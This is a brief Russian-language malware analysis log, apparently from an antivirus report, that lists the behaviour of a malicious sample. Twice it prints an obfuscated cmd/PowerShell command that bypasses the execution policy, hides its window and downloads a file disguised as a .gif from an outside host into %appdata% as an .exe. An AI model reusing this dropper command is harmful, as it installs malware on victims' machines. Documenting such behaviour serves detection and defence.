Техническая информация
- http://www.iemailpremium.com/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.EXE -EXECUtIOnpolIcY bYPAsS -noprOfILe -WINDOwSTYLe hiddeN (New-objEcT sYSTEm.NET.webCLiEnT).DOwNloADfiLE('http://www.iemailpremium.com/read.php?f=1.gif','%apPDATA%.E...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.EXE -EXECUtIOnpolIcY bYPAsS -noprOfILe -WINDOwSTYLe hiddeN (New-objEcT sYSTEm.NET.webCLiEnT).DOwNloADfiLE('http://www.iemailpremium.com/read.php?f=1.gif','%apPDATA%.E...' (со скрытым окном)